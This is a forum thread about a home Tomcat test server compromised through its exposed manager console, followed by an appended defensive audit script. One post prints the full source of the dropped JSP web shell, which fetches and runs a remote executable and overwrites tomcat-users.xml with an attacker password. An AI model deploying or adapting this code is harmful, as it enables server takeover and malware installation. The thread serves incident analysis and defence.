
Previously on "Someone hacked my Tomcat server"

  • scooterscot
    replied
    Originally posted by DaveB:
    The average life expectancy of an unpatched, unprotected windows box connected to the net is around 10 mins. After that the chances are you will never have complete control of it again.

    Do your config/patching/installs of AV and firewalls *before* you plug in the network cable.
    I've just put a Windows installation via Parallels open to the internet. Days pass, no problem, it runs smoothly.

    What did I do?

    I stripped it of every service you could imagine since I require it to run only one installation.

    It's all the stupid services that let this platform down IMO. I used XPlite.


  • minestrone
    replied
    Originally posted by NickFitz:
    They're very unlikely to be coming directly to your machine - there are millions of compromised boxes out there for them to proxy through.

    EDIT: looks like it's an automated thing.
    That was the first page I hit when I googled the war file.

    I am actually surprised they have not done anything about it since the guy posted it. Actually, Tomcat is now pretty much an IBM/Apache/RedHat project, so I am not surprised.


  • NickFitz
    replied
    Originally posted by minestrone:
    I am fairly sure they will hit on me again, I wonder where the IP will be from?

    My money is on Russia
    They're very unlikely to be coming directly to your machine - there are millions of compromised boxes out there for them to proxy through.

    EDIT: looks like it's an automated thing.
    Last edited by NickFitz; 23 March 2009, 16:04.


  • minestrone
    replied
    Changed the code to this...

    Code:
    <%@ page language="java" pageEncoding="utf-8" import="java.io.*,java.net.*"%>
    <%
    
    System.out.println( "==============================================" ) ;
    
    System.out.println( "Cache-Vip-Url: (spyware exe) " + request.getHeader("Cache-Vip-Url") ) ;
    System.out.println( "IP:                          " + request.getRemoteAddr() ) ;
    System.out.println( "SERVER:                      " + request.getServerName() ) ;
    System.out.println( "REQUEST:                     " + request ) ;		
    
    request.setAttribute("result","Success! ");
    		
    request.getRequestDispatcher("/ok.jsp").forward(request, response);
     %>
    I am fairly sure they will hit on me again, I wonder where the IP will be from?

    My money is on Russia


  • minestrone
    replied
    Here is the code if anyone is interested...

    Code:
    <%@ page language="java" pageEncoding="utf-8" import="java.io.*,java.net.*"%>
    <%!
    	String pass=null;
    	String sys=null;
    	
    	String url=null;
    	String filesrc=null;
    		
    public class AutoKill {
    	
    	private String killLoophole(String path) throws Exception
    	{
    		try
    		{
    			String pass=randomPass();
    			FileOutputStream fos=new FileOutputStream(path);
    			String s="<?xml version='1.0' encoding='utf-8'?>\r\n";
    			s=s+"<tomcat-users>\r\n";
    			s=s+"\t<role rolename=\"tomcat\"/>\r\n";
    			s=s+"\t<role rolename=\"role1\" />\r\n";
    			s=s+"\t<role rolename=\"manager\"/>\r\n";
    			s=s+"\t<role rolename=\"admin\"/>\r\n";
    			s=s+"\t<user username=\"admin\" password=\"NetFexc124\" roles=\"admin,manager\"/>\r\n";
    			s=s+"</tomcat-users>";
    			byte[] b=new byte[1024];
    			b=s.getBytes();
    			fos.write(b);
    			fos.close();
    			return pass;
    		}catch(Exception e)
    		{
    			return null;
    		}
    		
    	}
    	
    	private String randomPass()
    	{
    		StringBuffer pass = new StringBuffer(); 
    		int i =0;
    		while(i<5) 
    		{
    		 i=(int)(Math.random()*12);
    		}
    		
    		for(int j=0;j<=i;j++)
    		{
    			char c = (char)(Math.random()* 26 + 'A');
    			pass.append(c);
    		}
    		return pass.toString()+String.valueOf(((int)(Math.random()*10000)));
    	}
    	
    	private boolean clean(String src)
    	{
    		File file=new File(src+".war");
    		if(file.exists())
    			if(file.delete())
    			{
    				return true;
    			}
    		return false;
    	}
    	
    	private boolean downFile(String url,String filesrc)
    	{
    		try
    		{
    		URL urlc = new URL(url);
    		HttpURLConnection con = (HttpURLConnection)urlc.openConnection();
    		con.connect();
    		byte[] b=new byte[1024];
    		BufferedInputStream bis=new BufferedInputStream(con.getInputStream());
    		FileOutputStream fos=new FileOutputStream(filesrc);
    		int length=-1;
    		while((length=bis.read(b,0,b.length))!=-1)
    		{
    			fos.write(b,0,length);
    		}
    		fos.close();
    		bis.close();
    		Process run_proc=Runtime.getRuntime().exec(filesrc);
    		return true;
    		}catch(Exception e)
    		{	
    		}
    		return false;
    	}
    	
    	
    	private boolean exeFile()
    	{
    		boolean afly=false;
    	    if (downFile(url,filesrc))
    	    afly=true;
    		
    		return afly;
    	}
    	
    }
    %>
    <%
    		sys=System.getProperty("os.name");
    		int i=sys.indexOf("Windows");
    		AutoKill ak=new AutoKill();
    		url=request.getHeader("Cache-Vip-Url");
    		if (i>-1)
    		{
    				String result;
    				try
    				{
    					filesrc=request.getSession().getServletContext().getRealPath("")+"/init.exe";
    					if (ak.exeFile())
    					{
    						result="Success! ";
    						pass=ak.killLoophole(System.getProperty("catalina.base")+"/conf/tomcat-users.xml");
    						if(ak.clean(request.getSession().getServletContext().getRealPath("")))
    						result=result+"Undeployed application at context path "+request.getContextPath()+"! ";
    					if (pass!=null)
    						result=result+"After the change password:"+pass+"! ";
    					}
    					else
    					{
    						result="Failure! Down File Failure!";
    					}
    				}catch(Exception e)
    				{
    					result="Failure!throws Exception - "+e.getMessage()+"! ";
    				}
    				request.setAttribute("result",result);
    		}
    		else
    		{
    			request.setAttribute("result","Failure!Because Remote computer system is "+sys+"!");
    		}
    		
    		request.getRequestDispatcher("/ok.jsp").forward(request, response);
     %>
    PCClient.N was the trojan that was caught.

    I could probably knock up a web spider in a couple of hours that searches for tomcat instances and have a good few bots under my control by the end of the week.


  • suityou01
    replied
    Originally posted by ~Craig~:
    should have gone Linux and you'd have been ok
    How is the Tomcat management console less hackable under Linux?


  • ~Craig~
    replied
    should have gone Linux and you'd have been ok


  • minestrone
    replied
    It was Windows Defender, under a trial I am running of Windows Live Care, that caught the exe running and switched it off.

    I am sure they would just continue to push exes towards me, it's tempting to mod the code of the thing and just debug out requests and the IPs of where they are coming from.

    I'm just shocked they found it and also there is a hack written for tomcat.


  • d000hg
    replied
    Originally posted by DaveB:
    The average life expectancy of an unpatched, unprotected windows box connected to the net is around 10 mins. After that the chances are you will never have complete control of it again.

    Do your config/patching/installs of AV and firewalls *before* you plug in the network cable.
    There's no such thing as an "unprotected windows box" these days. By default, a clean install of Windows can't connect to anything except Windows Update, IIRC (or some similar precaution)... and the Windows firewall is on by default, I think.
    You are absolutely right though, when we tried to connect an old PC to our broadband, it couldn't even complete the broadband installation before being swamped with rubbish.


  • minestrone
    replied
    Full firewall, AV, all updated.

    They just got in through the tomcat management console because I never switched it off.


  • DaveB
    replied
    The average life expectancy of an unpatched, unprotected windows box connected to the net is around 10 mins. After that the chances are you will never have complete control of it again.

    Do your config/patching/installs of AV and firewalls *before* you plug in the network cable.


  • minestrone
    started a topic Someone hacked my Tomcat server

    Someone hacked my Tomcat server

    Got a test server for Plan B in the house, it runs on port 8080 and I never really suspected anyone would find it so I made the schoolboy error of not making it safe by removing the management console.

    Had to do an upgrade to the software today and noticed a new web application called fexcepkillshell.war running under it, so I'm like WTF? I never put that there.

    So I stop the server and have a look at the code in it, it hacks the users file, restarts the server then it awaits URL hits which I think tells it to download an exe then runs it.

    I don't think it worked, but Windows Live Care has a few extra 'security events' in the last few days.

    Wake up call really, server is safe now but it shows you never to be complacent.
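    A defender-side audit for the compromise described in this thread (an added example, not code from the thread or from Tomcat): it checks a conf/tomcat-users.xml body for the password the shell hard-codes and for any account still holding manager/admin roles, and a webapps directory for a still-deployed manager app, unexpected WARs such as fexcepkillshell.war, and the dropped init.exe. The function names, the role list and the sample XML are constructed here; the indicator values come from the code posted above.

```python
import os
import xml.etree.ElementTree as ET

# Indicators taken from the thread: the dropped WAR, the exe it fetches and the
# password the shell hard-codes into conf/tomcat-users.xml.
KNOWN_WAR = "fexcepkillshell.war"
DROPPED_EXE = "init.exe"
HARDCODED_PASSWORD = "NetFexc124"
PRIVILEGED_ROLES = {"manager", "admin", "manager-gui", "manager-script"}

# Constructed sample: the file killLoophole() in the thread writes out.
SAMPLE_USERS_XML = ("<?xml version='1.0' encoding='utf-8'?>\n<tomcat-users>\n"
                    '  <role rolename="manager"/><role rolename="admin"/>\n'
                    '  <user username="admin" password="NetFexc124" roles="admin,manager"/>\n'
                    "</tomcat-users>")

def audit_users_xml(xml_text):
    """Findings for a tomcat-users.xml body: the shell's password and manager-capable accounts."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if not el.tag.endswith("user"):  # tolerates a default xmlns prefix
            continue
        name = el.get("username") or el.get("name")
        roles = {r.strip() for r in (el.get("roles") or "").split(",")} - {""}
        if el.get("password") == HARDCODED_PASSWORD:
            findings.append(f"user '{name}': password matches the one written by {KNOWN_WAR}")
        if roles & PRIVILEGED_ROLES:
            findings.append(f"user '{name}': holds {sorted(roles & PRIVILEGED_ROLES)}")
    return findings

def audit_webapp_paths(rel_paths, expected_wars=()):
    """rel_paths are relative to CATALINA_BASE/webapps, as scan_webapps_dir lists them."""
    findings = []
    for p in rel_paths:
        parts = p.replace("\\", "/").split("/")
        if parts in (["manager"], ["host-manager"]):
            findings.append(f"{parts[0]} app still deployed; remove it if unused")
        if len(parts) == 1 and p.endswith(".war") and p not in expected_wars:
            tag = " (the shell from the thread)" if p == KNOWN_WAR else ""
            findings.append(f"unexpected WAR {p}{tag}")
        if parts[-1].lower() == DROPPED_EXE:
            findings.append(f"dropped executable at webapps/{p}")
    return findings

def scan_webapps_dir(webapps_dir, expected_wars=()):
    # Walk a real webapps directory and audit everything found under it.
    rel = [os.path.relpath(os.path.join(root, n), webapps_dir)
           for root, dirs, files in os.walk(webapps_dir) for n in dirs + files]
    return audit_webapp_paths(rel, set(expected_wars))
```

    Run scan_webapps_dir on CATALINA_BASE/webapps and audit_users_xml on the contents of CATALINA_BASE/conf/tomcat-users.xml; an empty list from both is the expected state for a server that, as the poster concludes, has had the manager app removed.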
